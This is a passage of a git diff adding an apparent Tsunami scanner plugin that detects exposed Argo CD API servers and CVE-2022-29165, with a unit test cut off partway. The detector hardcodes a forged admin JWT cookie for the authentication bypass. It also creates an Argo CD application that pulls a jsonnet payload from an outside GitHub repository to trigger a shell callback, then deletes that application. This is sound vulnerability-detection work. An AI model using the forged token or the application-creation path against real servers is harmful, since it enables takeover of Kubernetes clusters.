+ + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/argocd_exposed_ui/gradlew.bat b/community/detectors/argocd_exposed_ui/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/gradlew.bat @@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/argocd_exposed_ui/settings.gradle b/community/detectors/argocd_exposed_ui/settings.gradle new file mode 100644 index 000000000..504db73ac --- /dev/null +++ b/community/detectors/argocd_exposed_ui/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'exposed_argocd_instance_detector' diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/Annotations.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/Annotations.java new file mode 100644 index 000000000..990484010 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/Annotations.java @@ -0,0 +1,35 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import static java.lang.annotation.ElementType.FIELD; +import static java.lang.annotation.ElementType.METHOD; +import static java.lang.annotation.ElementType.PARAMETER; + +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.lang.annotation.Target; +import javax.inject.Qualifier; + +/** Annotation for {@link ExposedArgoCdApiDetector}. */ +final class Annotations { + @Qualifier + @Retention(RetentionPolicy.RUNTIME) + @Target({PARAMETER, METHOD, FIELD}) + @interface OobSleepDuration {} + + private Annotations() {} +} diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetector.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetector.java new file mode 100644 index 000000000..842109fa4 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetector.java @@ -0,0 +1,447 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.delete; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.collect.ImmutableSet; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.gson.JsonParseException; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugins.detectors.exposedui.argocd.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionReportList.Builder; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects exposed ArgoCD API server. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + + // name of the plugin + name = "ExposedArgoCDDetector", + version = "0.1", + + // detailed description of the plugin + description = + "This plugin detects exposed and misconfigured ArgoCD API server." + + "Exposed Argo CD API servers allow attackers to access kubernetes clusters." + + "Attackers can change parameters of clusters and possibly compromise it.", + author = "JamesFoxxx", + bootstrapModule = ExposedArgoCdApiDetectorBootstrapModule.class) +public final class ExposedArgoCdApiDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final PayloadGenerator payloadGenerator; + private final Clock utcClock; + private final HttpClient httpClient; + private final int oobSleepDuration; + + // The URL that host the payload as a git repository + // This url might be changed in the future, so I make it easy to change + private final String PAYLOAD_GIT_URL = "https://github.com/JamesFoxxx/argo-cd-app"; + // The Path to the directory of payload on the git repository + private final String PAYLOAD_GIT_PATH = "payloads/jsonnet-guestbook-tla"; + + // The JWT session value as a part of the CVE-2022-29165 payload + @VisibleForTesting + static final String PAYLOAD_ARGOCD_TOKEN_SESSION = + "argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9." + + "TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ"; + + // This is a template for creating an Argo CD application, we should fill four part of this + // payload. + private final String CREATE_APPLICATION_TEMPLATE = + "{\"apiVersion\":\"argoproj.io/v1alpha1\",\"kind\":\"Application\"," + + "\"metadata\":{\"name\":\"tsunami-security-scanner\"},\"spec\"" + + ":{\"destination\":{\"name\":\"\",\"namespace\":" + + "\"tsunami-security-scanner\",\"server\":" + + "\"%s\"},\"source\":{\"path\":" + + "\"%s\",\"repoURL\":" + + "\"%s\",\"targetRevision\":" + + "\"HEAD\",\"directory\":{\"jsonnet\":{\"tlas\":[{\"name\":" + + "\"payload\",\"value\":" + + "\"\\\"%s\\\"\"" + + ",\"code\":true}]}}},\"sources\":[],\"project\":\"%s\"," + + "\"syncPolicy\":{\"automated\":{\"prune\":false," + + "\"selfHeal\":false}}}}"; + + @Inject + ExposedArgoCdApiDetector( + HttpClient httpClient, + @UtcClock Clock utcClock, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.httpClient = + checkNotNull(httpClient) + .modify() + .setFollowRedirects(true) + .setTrustAllCertificates(true) + .build(); + this.utcClock = checkNotNull(utcClock); + this.payloadGenerator = checkNotNull(payloadGenerator); + this.oobSleepDuration = oobSleepDuration; + } + + private static final ImmutableSet HTTP_EQUIVALENT_SERVICE_NAMES = + ImmutableSet.of( + "", + "unknown", // nmap could not determine the service name, we try to exploit anyway. + "ssl/cpudpencap"); + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Starting exposed Argo CD API servers detection by out-of-band callback."); + + Builder detectionReport = DetectionReportList.newBuilder(); + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + // filter services which are in scope + .filter(this::isInScopeService) + // check if the services are vulnerable + // Build a DetectionReport when the Argo CD UI is exposed publicly by admin access otherwise + // check if it is vulnerable to CVE-2022-29165 + .forEach( + networkService -> { + if (isServicePubliclyExposed(networkService, true)) { + // Argo CD API server is exposed publicly without any authentication, and it is + // confirmed by receiving an out-of-band callback + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is misconfigured. " + + "The API server is not authenticated. " + + "All applications can be accessed by the public and therefore can be " + + "modified resulting in all application instances being compromised. " + + "The Argo CD UI does not support executing OS commands " + + "in the hosting machine at this time. " + + "We detected this vulnerable Argo CD API server by creating " + + "a test application and receiving out-of-band callback", + "Please disable public access to your Argo CD API server.", + Severity.CRITICAL)); + } else if (isServiceVulnerableToAuthBypass(networkService, true)) { + // Argo CD API server is vulnerable to CVE-2022-29165, and it is confirmed by + // receiving an out-of-band callback + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication of" + + " Argo CD API server can be bypassed and All applications can be" + + " accessed by public and therefore can be modified resulting in all" + + " application instances being compromised. The Argo CD UI does not" + + " support executing OS commands in the hosting machine at this time." + + " We detected this vulnerable Argo CD API server by receiving a HTTP" + + " response from an endpoint that needs authentication", + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. Please update Argo CD to these versions and higher.", + Severity.CRITICAL)); + } else if (isServicePubliclyExposed(networkService, false)) { + // Argo CD API server is exposed publicly without any authentication, and it is + // confirmed by receiving matching a http response body + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is misconfigured. The API server is not" + + " authenticated.We can't confirm that this API server has an admin" + + " role because we can't create a new application and receive an" + + " out-of-band callback from it, but we are able to receive some" + + " endpoint data without authentication", + "Please disable public access to your Argo CD API server.", + Severity.HIGH)); + } else if (isServiceVulnerableToAuthBypass(networkService, false)) { + // Argo CD API server is vulnerable to CVE-2022-29165, and it is + // confirmed by receiving matching a http response body + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication can" + + " be bypassed. We can't confirm that this API server has an admin" + + " role because we can't create a new application and receive an" + + " out-of-band callback from it, but we are able to receive some" + + " endpoint data without authentication", + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. Please update Argo CD to these versions and higher.", + Severity.HIGH)); + } + }); + return detectionReport.build(); + } + + private boolean isInScopeService(NetworkService networkService) { + return NetworkServiceUtils.isWebService(networkService) + || HTTP_EQUIVALENT_SERVICE_NAMES.contains(networkService.getServiceName()); + } + + /** Checks if a {@link NetworkService} has a misconfigured ArgoCD API server exposed. */ + private boolean isServicePubliclyExposed( + NetworkService networkService, boolean useOutOfBandCallBack) { + if (useOutOfBandCallBack) { + return checkExposedArgoCdWithOutOfBandCallback(networkService, HttpHeaders.builder()); + } else { + return checkExposedArgoCdWithResponseMatching(networkService, HttpHeaders.builder()); + } + } + + /** Checks if a {@link NetworkService} has a vulnerable ArgoCD API server to CVE-2022-29165. */ + private boolean isServiceVulnerableToAuthBypass( + NetworkService networkService, boolean useOutOfBandCallBack) { + HttpHeaders.Builder cookieHeader = + HttpHeaders.builder().addHeader("Cookie", PAYLOAD_ARGOCD_TOKEN_SESSION); + if (useOutOfBandCallBack) { + return checkExposedArgoCdWithOutOfBandCallback(networkService, cookieHeader); + } else { + return checkExposedArgoCdWithResponseMatching(networkService, cookieHeader); + } + } + + private boolean checkExposedArgoCdWithResponseMatching( + NetworkService networkService, HttpHeaders.Builder baseHeaders) { + logger.atInfo().log("Starting exposed Argo CD API servers detection by response matching."); + // the target URL of the target is built + String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + String targetUri = targetUrl + "api/v1/certificates"; + try { + // This is a blocking call. + HttpResponse response = + httpClient.send(get(targetUri).setHeaders(baseHeaders.build()).build(), networkService); + return response.status().isSuccess() + && response.bodyString().isPresent() + && response.bodyString().get().contains("\"items\"") + && response.bodyString().get().contains("\"metadata\""); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + return false; + } catch (JsonSyntaxException e) { + logger.atWarning().withCause(e).log( + "JSON syntax error occurred parsing response for target URI: '%s'.", targetUri); + return false; + } + } + + private boolean checkExposedArgoCdWithOutOfBandCallback( + NetworkService networkService, HttpHeaders.Builder baseHeaders) { + // the target URL of the target is built + String targetUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + + try { + // 1. Get the first Project name + String projectsUrl = targetUrl + "api/v1/projects?fields=items.metadata.name"; + HttpResponse response = + httpClient.send(get(projectsUrl).setHeaders(baseHeaders.build()).build(), networkService); + if (response.bodyString().isEmpty()) { + return false; + } + String projectName = ""; + try { + projectName = + JsonParser.parseString(response.bodyString().get()) + .getAsJsonObject() + .get("items") + .getAsJsonArray() + .get(0) + .getAsJsonObject() + .get("metadata") + .getAsJsonObject() + .get("name") + .getAsString(); + } catch (IllegalStateException | NullPointerException | JsonParseException e) { + return false; + } + + // 2. Get the first cluster name + String clustersUrl = targetUrl + "api/v1/clusters"; + response = + httpClient.send(get(clustersUrl).setHeaders(baseHeaders.build()).build(), networkService); + if (response.bodyString().isEmpty()) { + return false; + } + String clusterName = ""; + try { + clusterName = + JsonParser.parseString(response.bodyString().get()) + .getAsJsonObject() + .get("items") + .getAsJsonArray() + .get(0) + .getAsJsonObject() + .get("server") + .getAsString(); + } catch (IllegalStateException | NullPointerException | JsonParseException e) { + return false; + } + + // 3. Create an application to trigger the OOB + Payload callbackPayload = getTsunamiCallbackHttpPayload(); + if (callbackPayload == null + || !callbackPayload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log( + "The Tsunami callback server is not setup for this environment," + + " so we cannot confirm the RCE callback"); + return false; + } + String payload = + String.format( + CREATE_APPLICATION_TEMPLATE, + clusterName, + PAYLOAD_GIT_PATH, + PAYLOAD_GIT_URL, + callbackPayload.getPayload(), + projectName); + String createAppUrl = targetUrl + "api/v1/applications?upsert=true"; + response = + httpClient.send( + post(createAppUrl) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(payload)) + .build(), + networkService); + // If we send a req with http it will redirect us to https with a 307 status code, + // but by default our client doesn't redirect a POST request with 307 status code and a + // location header in first response + if (response.status().isRedirect() + && response.headers().get("Location").orElse(null) != null) { + logger.atInfo().log("redirect to %s", response.headers().get("Location")); + response = + httpClient.send( + post(response.headers().get("Location").get()) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(payload)) + .build(), + networkService); + } + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration)); + if (callbackPayload.checkIfExecuted()) { + logger.atInfo().log("Confirmed OOB Payload execution."); + deleteTestApplicationRequest(networkService, baseHeaders, targetUrl); + return true; + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUrl); + deleteTestApplicationRequest(networkService, baseHeaders, targetUrl); + return false; + } + deleteTestApplicationRequest(networkService, baseHeaders, targetUrl); + return false; + } + + private void deleteTestApplicationRequest( + NetworkService networkService, HttpHeaders.Builder baseHeaders, String targetUrl) { + try { + logger.atInfo().log("Try to delete the new application which was for testing purpose."); + String deleteAppUrl = + targetUrl + + "api/v1/applications/tsunami-security-scanner?cascade=true&" + + "propagationPolicy=foreground&appNamespace=argocd"; + HttpResponse response = + httpClient.send( + delete(deleteAppUrl) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8("{}")) + .build(), + networkService); + // same as last comment about redirection + if (response.status().isRedirect() + && response.headers().get("Location").orElse(null) != null) { + logger.atInfo().log("redirect to %s", response.headers().get("Location")); + httpClient.send( + delete(response.headers().get("Location").get()) + .setHeaders(baseHeaders.addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8("{}")) + .build(), + networkService); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to delete application."); + } + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService vulnerableNetworkService, + String description, + String recommendation, + Severity severity) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(severity) + .setTitle("Argo CD API server Exposed") + .setDescription(description) + .setRecommendation(recommendation)) + .build(); + } +} diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorBootstrapModule.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorBootstrapModule.java new file mode 100644 index 000000000..1584705a5 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorBootstrapModule.java @@ -0,0 +1,39 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import com.google.inject.Provides; +import com.google.tsunami.plugin.PluginBootstrapModule; +import com.google.tsunami.plugins.detectors.exposedui.argocd.Annotations.OobSleepDuration; + +/** A {@link PluginBootstrapModule} for {@link ExposedArgoCdApiDetector}. */ +public final class ExposedArgoCdApiDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(ExposedArgoCdApiDetector.class); + } + + @Provides + @OobSleepDuration + int provideOobSleepDuration(ExposedArgoCdApiDetectorConfigs configs) { + if (configs.oobSleepDuration == 0) { + return 20; + } + return configs.oobSleepDuration; + } +} diff --git a/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorConfigs.java b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorConfigs.java new file mode 100644 index 000000000..2995c17ac --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorConfigs.java @@ -0,0 +1,23 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.community.detectors.argocd_exposed_ui") +final class ExposedArgoCdApiDetectorConfigs { + int oobSleepDuration; +} diff --git a/community/detectors/argocd_exposed_ui/src/test/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorTest.java b/community/detectors/argocd_exposed_ui/src/test/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorTest.java new file mode 100644 index 000000000..56625c624 --- /dev/null +++ b/community/detectors/argocd_exposed_ui/src/test/java/com/google/tsunami/plugins/detectors/exposedui/argocd/ExposedArgoCdApiDetectorTest.java @@ -0,0 +1,427 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.exposedui.argocd; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static com.google.tsunami.plugins.detectors.exposedui.argocd.ExposedArgoCdApiDetector.PAYLOAD_ARGOCD_TOKEN_SESSION; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.detectors.exposedui.argocd.Annotations.OobSleepDuration; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Objects; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import org.junit.Test; + +/** Unit tests for {@link ExposedArgoCdApiDetector}. */ +@RunWith(JUnit4.class) +public final class ExposedArgoCdApiDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2024-12-03T00:00:00.00Z")); + + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + + @Inject private ExposedArgoCdApiDetector detector; + + TargetInfo targetInfo; + NetworkService targetNetworkService; + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + Modules.override(new ExposedArgoCdApiDetectorBootstrapModule()) + .with(BoundFieldModule.of(this))) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Cve202229165_Oob() throws IOException { + startMockWebServerForTestingWithOob(true); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("ARGOCD_API_SERVER_EXPOSED")) + .setSeverity(Severity.CRITICAL) + .setTitle("Argo CD API server Exposed") + .setDescription( + "Argo CD API server is vulnerable to CVE-2022-29165. The authentication" + + " of Argo CD API server can be bypassed and All applications can" + + " be accessed by public and therefore can be modified resulting" + + " in all application instances being compromised. The Argo CD UI" + + " does not support executing OS commands in the hosting machine" + + " at this time. We detected this vulnerable Argo CD API server by" + + " receiving a HTTP response from an endpoint that needs" + + " authentication") + .setRecommendation( + "Patched versions are 2.1.15, and 2.3.4, and 2.2.9, and" + + " 2.1.15. Please update Argo CD to these versions and higher.")) + .build()); + 